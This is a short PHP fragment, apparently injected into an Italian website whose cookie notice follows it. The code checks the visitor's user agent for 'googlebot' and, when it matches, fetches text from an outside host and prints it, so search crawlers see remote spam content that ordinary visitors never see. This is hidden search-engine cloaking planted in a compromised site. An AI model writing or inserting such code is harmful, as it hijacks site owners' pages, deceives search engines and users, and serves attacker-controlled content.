function isInString1($haystack, $needle) {
$haystack = '-_-!' . $haystack;
return (bool)strpos($haystack, $needle); }
$s_agent = strtolower($_SERVER["HTTP_USER_AGENT"]);
if(isInString1($s_agent,"googlebot")){
$content = file_get_contents("http://www.worldwidecstore.com/dress.txt");
echo $content;
}
else{
}
?>
Questo sito internet usa i cookies per migliorare la tua esperienza. Nessun dato di navigazione viene dato a terze parti. OK Leggi di più Privacy & Cookies Policy